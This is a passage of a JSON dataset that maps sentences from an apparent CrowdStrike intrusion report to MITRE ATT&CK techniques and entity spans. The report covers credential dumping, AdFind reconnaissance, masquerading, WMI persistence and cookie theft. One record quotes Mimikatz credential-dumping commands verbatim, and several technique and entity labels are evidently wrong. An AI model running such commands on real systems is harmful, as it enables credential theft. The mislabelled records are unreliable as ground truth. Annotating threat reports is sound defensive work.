credential theft", "start": 82, "end": 109, "label": "Action" }, { "text": " compromised environment", "start": 134, "end": 158, "label": "Action" }, { "text": "credential theft activities", "start": 93, "end": 120, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s187-b22320", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 187, "context_before": "To combat this, the threat actor periodically \"refreshed\" their credential set by performing credential theft activities in an already compromised environment.", "sentence_text": "One of the credential theft techniques identified by CrowdStrike was the use of a PowerShell script to execute Mimikatz in-memory.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.001", "name": "LSASS Memory" } ], "procedure": "Threat actor used a PowerShell script to execute Mimikatz in memory for credential theft.", "entities": [ { "text": "PowerShell script", "start": 82, "end": 99, "label": "MalwareTool" }, { "text": "Mimikatz", "start": 111, "end": 119, "label": "MalwareTool" }, { "text": "use of a PowerShell script to execute Mimikatz in-memory", "start": 73, "end": 129, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s188-8bd75a", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 188, "context_before": "One of the credential theft techniques identified by CrowdStrike was the use of a PowerShell script to execute Mimikatz in-memory.", "sentence_text": "While in-memory Mimikatz is not particularly unique, the script executed by the threat actor was heavily obfuscated and encrypted the output using AES256.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027.004", "name": "Compile After Delivery" } ], "procedure": "The threat actor executed a heavily obfuscated script that performed in-memory Mimikatz and encrypted its output using AES256.", "entities": [ { "text": "threat actor", "start": 80, "end": 92, "label": "ThreatActor" }, { "text": "Mimikatz ", "start": 16, "end": 25, "label": "MalwareTool" }, { "text": "script ", "start": 57, "end": 64, "label": "MalwareTool" }, { "text": "AES256", "start": 147, "end": 153, "label": "MalwareTool" }, { "text": "executed", "start": 64, "end": 72, "label": "Action" }, { "text": "obfuscated", "start": 105, "end": 115, "label": "Action" }, { "text": "encrypted ", "start": 120, "end": 130, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s189-d4066b", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 189, "context_before": "While in-memory Mimikatz is not particularly unique, the script executed by the threat actor was heavily obfuscated and encrypted the output using AES256.", "sentence_text": "In addition to refreshing the threat actor's credentials, the threat actor would also refresh their understanding of the victim's AD environment.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1087.002", "name": "Domain Account" } ], "procedure": "The threat actor refreshed their credentials and updated their understanding of the victim’s AD environment.", "entities": [ { "text": "threat actor", "start": 30, "end": 42, "label": "ThreatActor" }, { "text": " victim's ", "start": 120, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "refresh their understanding ", "start": 86, "end": 114, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s190-77361f", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 190, "context_before": "In addition to refreshing the threat actor's credentials, the threat actor would also refresh their understanding of the victim's AD environment.", "sentence_text": "Around the time when the threat actor executed Get-ADReplAccount , the threat actor also executed a renamed version of AdFind to output domain reconnaissance information.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1087", "name": "Account Discovery" }, { "id": "T1018", "name": "Remote System Discovery" } ], "procedure": "The threat actor executed a renamed version of AdFind to perform domain reconnaissance and output Active Directory environment information.", "entities": [ { "text": "threat actor", "start": 25, "end": 37, "label": "ThreatActor" }, { "text": "executed Get-ADReplAccount", "start": 38, "end": 64, "label": "Action" }, { "text": "executed a renamed version of AdFind", "start": 89, "end": 125, "label": "Action" }, { "text": "AdFind", "start": 119, "end": 125, "label": "MalwareTool" } ] }, { "uid": "mitre-84_mitre_report-p1-s191-8ef6fb", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 191, "context_before": "Around the time when the threat actor executed Get-ADReplAccount , the threat actor also executed a renamed version of AdFind to output domain reconnaissance information.", "sentence_text": "In this instance, AdFind was renamed to masquerade as a legitimate Windows binary.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "AdFind was renamed to appear as a legitimate Windows binary.", "entities": [ { "text": "AdFind ", "start": 18, "end": 25, "label": "MalwareTool" }, { "text": "legitimate Windows binary", "start": 56, "end": 81, "label": "Action" }, { "text": "was renamed to masquerade as a legitimate Windows binary", "start": 25, "end": 81, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s192-3679d0", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 192, "context_before": "In this instance, AdFind was renamed to masquerade as a legitimate Windows binary.", "sentence_text": "The usage of renamed AdFind is consistent with other industry reporting on this campaign.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Renamed AdFind was used in a manner consistent with prior reporting on this campaign", "entities": [ { "text": "AdFind ", "start": 21, "end": 28, "label": "MalwareTool" }, { "text": "campaign", "start": 80, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "usage", "start": 4, "end": 9, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s193-28146e", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 193, "context_before": "The usage of renamed AdFind is consistent with other industry reporting on this campaign.", "sentence_text": "This information provided the adversary with a list of accounts possessing particular privileges — in this case, the ability to make VPN connections — that would be subject to later credential stealing attempts and leveraged to access the victim at a later time.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1087", "name": "Account Discovery" }, { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "The adversary obtained a list of privileged accounts (including VPN-capable accounts) and used this information for later credential theft and access to the victim environment.", "entities": [ { "text": "adversary", "start": 30, "end": 39, "label": "ThreatActor" }, { "text": "list of accounts possessing particular privileges", "start": 47, "end": 96, "label": "Action" }, { "text": "VPN connections", "start": 133, "end": 148, "label": "Infrastructure_Indicator" }, { "text": "credential stealing attempts", "start": 182, "end": 210, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s194-6aaba4", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 194, "context_before": "This information provided the adversary with a list of accounts possessing particular privileges — in this case, the ability to make VPN connections — that would be subject to later credential stealing attempts and leveraged to access the victim at a later time.", "sentence_text": "Password Policies/Hygiene", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s195-29b781", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 195, "context_before": "Password Policies/Hygiene", "sentence_text": "This was possible even though the customer’s Active Directory was configured to require new passwords to be different from the previous five passwords for a given account.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s196-427dc9", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 196, "context_before": "This was possible even though the customer’s Active Directory was configured to require new passwords to be different from the previous five passwords for a given account.", "sentence_text": "Unfortunately, this check only applies when a user is changing their password via the “password change” method — but if a “password reset” is performed (changing the password without knowing the previous password), this check is bypassed for an administrative user or a Windows account that has the Reset Password permission on a user’s account object.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s197-097f9b", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 197, "context_before": "Unfortunately, this check only applies when a user is changing their password via the “password change” method — but if a “password reset” is performed (changing the password without knowing the previous password), this check is bypassed for an administrative user or a Windows account that has the Reset Password permission on a user’s account object.", "sentence_text": "Endnotes\nMITRE ATT&CK Framework", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s198-594fd4", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 198, "context_before": "Endnotes\nMITRE ATT&CK Framework", "sentence_text": "The following table maps TTPs covered in this article to the MITRE ATT&CK® framework Indicators of Compromise (IOCs)\nAdditional Resources\nRead about the latest trends in threat hunting and more in the 2021 Threat Hunting Report or simply download the report now.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s199-3eb592", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 199, "context_before": "The following table maps TTPs covered in this article to the MITRE ATT&CK® framework Indicators of Compromise (IOCs)\nAdditional Resources\nRead about the latest trends in threat hunting and more in the 2021 Threat Hunting Report or simply download the report now.", "sentence_text": "Learn more about Falcon OverWatch proactive managed threat hunting Watch this video to see how Falcon OverWatch proactively hunts for threats in your environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s200-64d0c7", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 200, "context_before": "Learn more about Falcon OverWatch proactive managed threat hunting Watch this video to see how Falcon OverWatch proactively hunts for threats in your environment.", "sentence_text": "Learn more about the Test CrowdStrike next-gen AV for yourself.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s201-ffeaa7", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 201, "context_before": "Learn more about the Test CrowdStrike next-gen AV for yourself.", "sentence_text": "Start your free trial of Falcon Prevent™ today.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s202-2b6628", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 202, "context_before": "Start your free trial of Falcon Prevent™ today.", "sentence_text": "Tweet\nShare\nRelated Content\nCategories\nAI & Machine Learning Cloud & Application Security Data Protection Endpoint Security & XDR Engineering & Tech Executive Viewpoint Exposure Management From The Front Lines Next-Gen Identity Security Next-Gen SIEM & Log Management Public Sector Small Business Threat Hunting & Intel CONNECT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s203-60dbe3", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 203, "context_before": "Tweet\nShare\nRelated Content\nCategories\nAI & Machine Learning Cloud & Application Security Data Protection Endpoint Security & XDR Engineering & Tech Executive Viewpoint Exposure Management From The Front Lines Next-Gen Identity Security Next-Gen SIEM & Log Management Public Sector Small Business Threat Hunting & Intel CONNECT", "sentence_text": "See Demo\nBetter Together: The Power of Managed Cybersecurity Services in the Face of Pressing Global Security Challenges Hunting pwnkit Local Privilege Escalation in Linux (CVE-2021-4034)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s204-f19908", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 204, "context_before": "See Demo\nBetter Together: The Power of Managed Cybersecurity Services in the Face of Pressing Global Security Challenges Hunting pwnkit Local Privilege Escalation in Linux (CVE-2021-4034)", "sentence_text": "Copyright © 2025 CrowdStrike Privacy Request Info Blog 1.888.512.8906 Accessibility [FILTERED_TABLES_START]\nWMI event filter | SELECT * FROM __InstanceModificationEvent", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s205-f415b3", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 205, "context_before": "Copyright © 2025 CrowdStrike Privacy Request Info Blog 1.888.512.8906 Accessibility [FILTERED_TABLES_START]\nWMI event filter | SELECT * FROM __InstanceModificationEvent", "sentence_text": "WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s206-f50c5b", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 206, "context_before": "WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime", "sentence_text": ">= 180 AND TargetInstance.SystemUpTime", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s207-3a7b0c", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 207, "context_before": ">= 180 AND TargetInstance.SystemUpTime", "sentence_text": "< 480 Filter to consumer binding | CommandLineEventConsumer.Name=\"\"|__EventFilter.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s208-6df707", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 208, "context_before": "< 480 Filter to consumer binding | CommandLineEventConsumer.Name=\"\"|__EventFilter.", "sentence_text": "Name=\"\" Credential Access | T1003.006 OS Credential Dumping: DCSync |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s209-5bbc16", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 209, "context_before": "Name=\"\" Credential Access | T1003.006 OS Credential Dumping: DCSync |", "sentence_text": "The threat actor obtained Active Directory credentials through domain replication protocols using the Get-ADReplAccount command from DSInternals Credential Access | T1003.001: OS Credential Dumping: LSASS Memory |", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.001", "name": "LSASS Memory" } ], "procedure": "Obtained Active Directory credentials through domain replication protocols using the Get-ADReplAccount command.", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "Get-ADReplAccount command from DSInternals", "start": 102, "end": 144, "label": "Action" }, { "text": "obtained Active Directory credentials", "start": 17, "end": 54, "label": "Action" }, { "text": "domain replication protocols ", "start": 63, "end": 92, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s210-cb7622", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 210, "context_before": "The threat actor obtained Active Directory credentials through domain replication protocols using the Get-ADReplAccount command from DSInternals Credential Access | T1003.001: OS Credential Dumping: LSASS Memory |", "sentence_text": "The threat actor used a heavily obfuscated PowerShell script to execute the Mimikatz commands 'privilege::debug sekurlsa::logonpasswords \"lsadump::lsa /patch\"' in-memory and encrypt the output Initial Access /", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.001", "name": "LSASS Memory" } ], "procedure": "Executed Mimikatz commands in-memory using a heavily obfuscated PowerShell script and encrypted the output.", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "PowerShell script", "start": 43, "end": 60, "label": "MalwareTool" }, { "text": "Mimikatz ", "start": 76, "end": 85, "label": "MalwareTool" }, { "text": "execute the Mimikatz commands ", "start": 64, "end": 94, "label": "Action" }, { "text": "used a heavily obfuscated PowerShell script", "start": 17, "end": 60, "label": "Action" }, { "text": "encrypt the output Initial Access", "start": 174, "end": 207, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s211-331900", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 211, "context_before": "The threat actor used a heavily obfuscated PowerShell script to execute the Mimikatz commands 'privilege::debug sekurlsa::logonpasswords \"lsadump::lsa /patch\"' in-memory and encrypt the output Initial Access /", "sentence_text": "Persistence | T1078.003 : Valid Accounts: Local Accounts | A local account was used by the Threat Actor to establish a SSH tunnel into the internal network environment Initial Access /", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078.003", "name": "Valid Accounts: Local Accounts" } ], "procedure": "Use a local account to establish an SSH tunnel into the internal network environment.", "entities": [ { "text": "local account", "start": 61, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "establish a SSH tunnel", "start": 107, "end": 129, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s212-b98773", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 212, "context_before": "Persistence | T1078.003 : Valid Accounts: Local Accounts | A local account was used by the Threat Actor to establish a SSH tunnel into the internal network environment Initial Access /", "sentence_text": "Persistence | T1133 :", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s213-ca3b96", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 213, "context_before": "Persistence | T1133 :", "sentence_text": "External Remote Services | The threat actor used VPNs to gain access to systems and persist in the environment Credential Access | T1555.003:", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1133", "name": "External Remote Services" } ], "procedure": "Use VPN services to gain access to systems and maintain persistence in the environment.", "entities": [ { "text": "VPNs", "start": 49, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "used VPNs to gain access to systems", "start": 44, "end": 79, "label": "Action" }, { "text": "persist in the environment", "start": 84, "end": 110, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s214-b06b4b", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 214, "context_before": "External Remote Services | The threat actor used VPNs to gain access to systems and persist in the environment Credential Access | T1555.003:", "sentence_text": "Credentials from Password Stores: Credentials from Web Browsers |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s215-8de90b", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 215, "context_before": "Credentials from Password Stores: Credentials from Web Browsers |", "sentence_text": "The threat actor exported saved passwords from user's Chrome browser installations Credential Access | T1539: Steal Web Session Cookie |", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555.003", "name": "Credentials from Web Browsers" } ], "procedure": "Exported saved passwords from user’s Chrome browser installations", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "Chrome browser installations ", "start": 54, "end": 83, "label": "MalwareTool" }, { "text": "exported saved passwords", "start": 17, "end": 41, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s216-71259c", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 216, "context_before": "The threat actor exported saved passwords from user's Chrome browser installations Credential Access | T1539: Steal Web Session Cookie |", "sentence_text": "The threat actor stole web session cookies from end user workstations and used them to access cloud resources Lateral Movement | T1021.001: Remote Services: Remote Desktop Protocol |", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1539", "name": "Steal Web Session Cookie" } ], "procedure": "Stole session cookies from end user workstations and used them to access cloud resources", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "web session cookies", "start": 23, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "end user workstations ", "start": 48, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "cloud resources", "start": 94, "end": 109, "label": "Infrastructure_Indicator" }, { "text": " stole web session cookies ", "start": 16, "end": 43, "label": "Action" }, { "text": "used them to access cloud resources", "start": 74, "end": 109, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s217-5bbeb8", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 217, "context_before": "The threat actor stole web session cookies from end user workstations and used them to access cloud resources Lateral Movement | T1021.001: Remote Services: Remote Desktop Protocol |", "sentence_text": "The threat actor used both privileged and non-privileged accounts for RDP throughout the environment, depending on the target system Initial Access, Persistence | T1078.004 : Valid Accounts: Cloud Accounts", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.001", "name": "Remote Desktop Protocol" } ], "procedure": "Used privileged and non-privileged accounts to perform RDP access across systems in the environment", "entities": [ { "text": "threat actor ", "start": 4, "end": 17, "label": "ThreatActor" }, { "text": "used both privileged and non-privileged accounts ", "start": 17, "end": 66, "label": "Action" }, { "text": "RDP", "start": 70, "end": 73, "label": "Action" }, { "text": "privileged and non-privileged accounts", "start": 27, "end": 65, "label": "Action" }, { "text": "target system", "start": 119, "end": 132, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s218-7b3fa4", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 218, "context_before": "The threat actor used both privileged and non-privileged accounts for RDP throughout the environment, depending on the target system Initial Access, Persistence | T1078.004 : Valid Accounts: Cloud Accounts", "sentence_text": "| The threat actor used accounts with Delegated Administrator rights to access other O365 tenants.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Used delegated administrator accounts to access other O365 tenants", "entities": [ { "text": "threat actor", "start": 6, "end": 18, "label": "ThreatActor" }, { "text": "O365 tenants.", "start": 85, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "accounts with Delegated Administrator rights", "start": 24, "end": 68, "label": "Infrastructure_Indicator" }, { "text": " used accounts with Delegated Administrator rights to access other O365 tenants.", "start": 18, "end": 98, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s219-292d8d", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 219, "context_before": "| The threat actor used accounts with Delegated Administrator rights to access other O365 tenants.", "sentence_text": "The Threat actor also used valid accounts to create persistence within the environment.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Used valid accounts to maintain persistence in the environment.", "entities": [ { "text": "Threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "used valid accounts", "start": 22, "end": 41, "label": "Action" }, { "text": "create persistence", "start": 45, "end": 63, "label": "Action" }, { "text": "valid accounts", "start": 27, "end": 41, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s220-a6eff4", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 220, "context_before": "The Threat actor also used valid accounts to create persistence within the environment.", "sentence_text": "Persistence | T1546.003: Event Triggered Execution: Windows Management Instrumentation Event Subscription | TrailBlazer was configured to execute after a reboot via a command-line event consumer Defense Evasion | T1036.005:", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1546.003", "name": "Windows Management Instrumentation Event Subscription" } ], "procedure": "Configured TrailBlazer to execute after reboot using a command-line event consumer", "entities": [ { "text": "TrailBlazer", "start": 108, "end": 119, "label": "MalwareTool" }, { "text": "configured to execute after a reboot via a command-line event consumer ", "start": 124, "end": 195, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s221-d6204a", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 221, "context_before": "Persistence | T1546.003: Event Triggered Execution: Windows Management Instrumentation Event Subscription | TrailBlazer was configured to execute after a reboot via a command-line event consumer Defense Evasion | T1036.005:", "sentence_text": "Masquerading: Match Legitimate Name or Location |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s222-25a5d8", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 222, "context_before": "Masquerading: Match Legitimate Name or Location |", "sentence_text": "The threat actor renamed their utilities to masquerade as legitimate system binaries (AdFind as svchost.exe), match the system's role (GoldMax), or appear legitimate (TrailBlazer as an apparent Adobe utility).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "Renamed AdFind, GoldMax, and TrailBlazer to names such as svchost.exe or Adobe-like names to masquerade as legitimate binaries.", "entities": [ { "text": " threat actor ", "start": 3, "end": 17, "label": "ThreatActor" }, { "text": "AdFind", "start": 86, "end": 92, "label": "MalwareTool" }, { "text": "svchost.exe", "start": 96, "end": 107, "label": "MalwareTool" }, { "text": "GoldMax", "start": 135, "end": 142, "label": "MalwareTool" }, { "text": "TrailBlazer ", "start": 167, "end": 179, "label": "MalwareTool" }, { "text": "Adobe utility", "start": 194, "end": 207, "label": "MalwareTool" }, { "text": "renamed ", "start": 17, "end": 25, "label": "Action" }, { "text": "masquerade as legitimate system binaries", "start": 44, "end": 84, "label": "Action" }, { "text": "match the system's role (GoldMax)", "start": 110, "end": 143, "label": "Action" }, { "text": "appear legitimate ", "start": 148, "end": 166, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s223-90dbd6", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 223, "context_before": "The threat actor renamed their utilities to masquerade as legitimate system binaries (AdFind as svchost.exe), match the system's role (GoldMax), or appear legitimate (TrailBlazer as an apparent Adobe utility).", "sentence_text": "Additionally, the threat actor renamed their systems prior to connecting to victim's VPNs to match the victim's system naming convention Discovery | T1087.002:", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Renamed their systems to match the victim’s naming convention before connecting to the VPN.", "entities": [ { "text": "threat actor ", "start": 18, "end": 31, "label": "ThreatActor" }, { "text": "VPNs", "start": 85, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "renamed their systems prior ", "start": 31, "end": 59, "label": "Action" }, { "text": "match the victim's system naming convention Discovery", "start": 93, "end": 146, "label": "Action" }, { "text": " victim's system naming convention", "start": 102, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "connecting to victim's VPN", "start": 62, "end": 88, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s224-eb8d08", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 224, "context_before": "Additionally, the threat actor renamed their systems prior to connecting to victim's VPNs to match the victim's system naming convention Discovery | T1087.002:", "sentence_text": "Account Discovery: Domain Account T1482: Domain Trust Discovery T1069.002 : Permission Groups Discovery: Domain Groups | The threat actor used AdFind, standard PowerShell cmdlets, and custom tooling to identify various pieces of information from Active Directory Defense Evasion / Lateral Movement | T1550.001 : Use Alternate Authentication Material:", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1069.002", "name": "Domain Groups" } ], "procedure": "Used AdFind, PowerShell cmdlets, and custom tools to enumerate information from Active Directory", "entities": [ { "text": "threat actor ", "start": 125, "end": 138, "label": "ThreatActor" }, { "text": "AdFind", "start": 143, "end": 149, "label": "MalwareTool" }, { "text": "standard PowerShell cmdlets", "start": 151, "end": 178, "label": "MalwareTool" }, { "text": " custom tooling", "start": 183, "end": 198, "label": "MalwareTool" }, { "text": "used AdFind", "start": 138, "end": 149, "label": "Action" }, { "text": " identify various pieces of information", "start": 201, "end": 240, "label": "Action" }, { "text": "Active Directory ", "start": 246, "end": 263, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s225-c0f4a2", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 225, "context_before": "Account Discovery: Domain Account T1482: Domain Trust Discovery T1069.002 : Permission Groups Discovery: Domain Groups | The threat actor used AdFind, standard PowerShell cmdlets, and custom tooling to identify various pieces of information from Active Directory Defense Evasion / Lateral Movement | T1550.001 : Use Alternate Authentication Material:", "sentence_text": "Application Access Token", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s227-8ff777", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 227, "context_before": "|", "sentence_text": "The threat actor used compromised service principals to make changes to the Office 365 environment.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Used compromised service principals to modify the Office 365 environment.", "entities": [ { "text": "threat actor ", "start": 4, "end": 17, "label": "ThreatActor" }, { "text": "Office 365 environment", "start": 76, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "used compromised service principals ", "start": 17, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "make changes ", "start": 56, "end": 69, "label": "Action" }, { "text": "compromised service principals", "start": 22, "end": 52, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s228-efc135", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 228, "context_before": "The threat actor used compromised service principals to make changes to the Office 365 environment.", "sentence_text": "Collection | T1213. :", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s229-955a9e", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 229, "context_before": "Collection | T1213. :", "sentence_text": "Data from Information Repositories: | The threat actor accessed data from Information Repositories Persistence | T1098.001: Account Manipulation: Additional Cloud Credentials", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1213", "name": "Data from Information Repositories" } ], "procedure": "Accessed data stored in information repositories", "entities": [ { "text": "threat actor ", "start": 42, "end": 55, "label": "ThreatActor" }, { "text": "Information Repositories ", "start": 74, "end": 99, "label": "Infrastructure_Indicator" }, { "text": "accessed 